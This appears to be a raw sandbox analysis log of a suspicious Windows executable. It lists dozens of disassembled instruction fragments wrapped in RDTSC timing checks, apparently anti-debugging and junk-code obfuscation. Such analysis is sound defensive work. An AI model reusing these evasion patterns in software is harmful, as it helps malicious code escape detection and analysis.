              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB347 second address: 8DB34B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8DB34B second address: 8DB351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 85D068 second address: 85D091 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F92851B8955h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jnp 00007F92851B8946h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E2CE8 second address: 8E2D03 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F9284AFDC91h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8ABF79 second address: 8ABF7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E321D second address: 8E3221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E3221 second address: 8E3236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F92851B8946h 0x0000000d js 00007F92851B8946h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E35D6 second address: 8E35EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jc 00007F9284AFDC86h 0x0000000c jg 00007F9284AFDC86h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E375A second address: 8E376A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F92851B8946h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E717E second address: 8E7183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7183 second address: 8E719F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8952h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F92851B8946h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E719F second address: 8E71B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC96h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E71B9 second address: 8E71C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B14E1 second address: 8B14E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B15D6 second address: 8B15F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F92851B8954h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B16D7 second address: 8B1737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 js 00007F9284AFDC95h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 js 00007F9284AFDC86h 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push 00000000h 0x00000020 push ecx 0x00000021 call 00007F9284AFDC88h 0x00000026 pop ecx 0x00000027 mov dword ptr [esp+04h], ecx 0x0000002b add dword ptr [esp+04h], 0000001Bh 0x00000033 inc ecx 0x00000034 push ecx 0x00000035 ret 0x00000036 pop ecx 0x00000037 ret 0x00000038 mov dword ptr [ebp+124503A1h], edi 0x0000003e push 2B5088E1h 0x00000043 push edi 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1737 second address: 8B173B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B197A second address: 8B19D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F9284AFDC93h 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jg 00007F9284AFDC8Ah 0x00000016 mov eax, dword ptr [eax] 0x00000018 jbe 00007F9284AFDC8Ch 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b jmp 00007F9284AFDC96h 0x00000030 jnc 00007F9284AFDC86h 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1BAE second address: 8B1BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1BB2 second address: 8B1BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1BB8 second address: 8B1BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F92851B8957h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1BD3 second address: 8B1C50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007F9284AFDC88h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 mov dword ptr [ebp+1244CD6Fh], esi 0x0000002e push 00000004h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F9284AFDC88h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a push eax 0x0000004b pushad 0x0000004c pushad 0x0000004d pushad 0x0000004e popad 0x0000004f jmp 00007F9284AFDC91h 0x00000054 popad 0x00000055 push eax 0x00000056 push edx 0x00000057 jno 00007F9284AFDC86h 0x0000005d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B242A second address: 8B2430 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B2430 second address: 8B24EE instructions: 0x00000000 rdtsc 0x00000002 jng 00007F9284AFDC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D2BA9h], esi 0x00000015 lea eax, dword ptr [ebp+12485DC2h] 0x0000001b nop 0x0000001c je 00007F9284AFDC92h 0x00000022 jns 00007F9284AFDC8Ch 0x00000028 push eax 0x00000029 jp 00007F9284AFDC9Eh 0x0000002f jmp 00007F9284AFDC98h 0x00000034 nop 0x00000035 call 00007F9284AFDC8Fh 0x0000003a mov dword ptr [ebp+122D381Bh], esi 0x00000040 pop ecx 0x00000041 lea eax, dword ptr [ebp+12485D7Eh] 0x00000047 push 00000000h 0x00000049 push eax 0x0000004a call 00007F9284AFDC88h 0x0000004f pop eax 0x00000050 mov dword ptr [esp+04h], eax 0x00000054 add dword ptr [esp+04h], 00000017h 0x0000005c inc eax 0x0000005d push eax 0x0000005e ret 0x0000005f pop eax 0x00000060 ret 0x00000061 mov edx, ecx 0x00000063 jl 00007F9284AFDC8Ch 0x00000069 add dword ptr [ebp+122D5AE9h], eax 0x0000006f or edi, dword ptr [ebp+12478B17h] 0x00000075 nop 0x00000076 jmp 00007F9284AFDC97h 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e pushad 0x0000007f pushad 0x00000080 popad 0x00000081 pushad 0x00000082 popad 0x00000083 popad 0x00000084 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B24EE second address: 8B24F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B24F3 second address: 892FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9284AFDC91h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007F9284AFDC88h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov di, 607Ah 0x0000002b and edi, 4BCA7FDBh 0x00000031 call dword ptr [ebp+122D39F5h] 0x00000037 pushad 0x00000038 jnc 00007F9284AFDC88h 0x0000003e jng 00007F9284AFDC92h 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7478 second address: 8E747C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E747C second address: 8E7482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7482 second address: 8E74A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8954h 0x00000007 js 00007F92851B8948h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E74A8 second address: 8E74CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F9284AFDC98h 0x0000000c jbe 00007F9284AFDC86h 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E74CE second address: 8E74D3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E77AD second address: 8E77B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E77B9 second address: 8E77E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B894Dh 0x00000007 jmp 00007F92851B8954h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E77E4 second address: 8E77E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7971 second address: 8E7975 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7AE1 second address: 8E7B2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F9284AFDC9Dh 0x0000000c push edx 0x0000000d pop edx 0x0000000e jmp 00007F9284AFDC95h 0x00000013 pop ecx 0x00000014 pushad 0x00000015 pushad 0x00000016 pushad 0x00000017 popad 0x00000018 js 00007F9284AFDC86h 0x0000001e jmp 00007F9284AFDC95h 0x00000023 popad 0x00000024 pushad 0x00000025 pushad 0x00000026 popad 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7DED second address: 8E7DF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7DF2 second address: 8E7E33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9284AFDC86h 0x0000000a jg 00007F9284AFDC86h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F9284AFDC97h 0x0000001d pop ebx 0x0000001e pushad 0x0000001f jmp 00007F9284AFDC8Dh 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7E33 second address: 8E7E3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F92851B8946h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7E3E second address: 8E7E44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7FD1 second address: 8E7FED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F92851B8946h 0x00000009 jmp 00007F92851B8951h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8E7FED second address: 8E7FFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F9284AFDC8Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0BD9 second address: 8F0BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF5D7 second address: 8EF5DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF5DE second address: 8EF603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edi 0x0000000a jng 00007F92851B8990h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F92851B8951h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF603 second address: 8EF607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF772 second address: 8EF778 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFA3B second address: 8EFA3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFB84 second address: 8EFB88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFB88 second address: 8EFB8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFB8C second address: 8EFBB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F92851B8946h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F92851B8955h 0x00000013 jg 00007F92851B8946h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EFEFB second address: 8EFF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F003D second address: 8F0058 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007F92851B894Eh 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0619 second address: 8F0623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9284AFDC86h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0623 second address: 8F0645 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F92851B8946h 0x00000008 jmp 00007F92851B8950h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jg 00007F92851B8946h 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F0645 second address: 8F0659 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F9284AFDC86h 0x00000008 jng 00007F9284AFDC86h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF275 second address: 8EF27F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF27F second address: 8EF284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8EF284 second address: 8EF29B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F92851B894Dh 0x00000009 jbe 00007F92851B8946h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F2676 second address: 8F267A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6849 second address: 8F6867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F92851B8956h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6867 second address: 8F686D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F686D second address: 8F688F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F92851B8946h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F92851B894Ch 0x00000013 pushad 0x00000014 push esi 0x00000015 pop esi 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6A08 second address: 8F6A14 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6C63 second address: 8F6C7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F92851B8953h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F6C7E second address: 8F6C82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872E94 second address: 872E9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872E9A second address: 872EA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872EA3 second address: 872EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8E6E second address: 8F8E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8F8E74 second address: 8F8E78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD1F2 second address: 8FD1F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD613 second address: 8FD61D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F92851B8946h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD61D second address: 8FD635 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9284AFDC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c ja 00007F9284AFDC86h 0x00000012 je 00007F9284AFDC86h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD7C5 second address: 8FD7F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 jmp 00007F92851B8952h 0x0000000b jmp 00007F92851B8950h 0x00000010 jg 00007F92851B8946h 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8FD945 second address: 8FD969 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9284AFDC8Fh 0x00000007 jnl 00007F9284AFDC86h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jnc 00007F9284AFDC86h 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 904625 second address: 90463C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F92851B8951h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90463C second address: 904640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90301B second address: 90302D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F92851B8946h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 90302D second address: 903031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 903345 second address: 903395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jmp 00007F92851B8954h 0x0000000b jmp 00007F92851B8957h 0x00000010 pop ecx 0x00000011 jc 00007F92851B8952h 0x00000017 jmp 00007F92851B894Ah 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jbe 00007F92851B8946h 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9034D6 second address: 9034DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9034DE second address: 9034E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8B1E30 second address: 8B1E3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
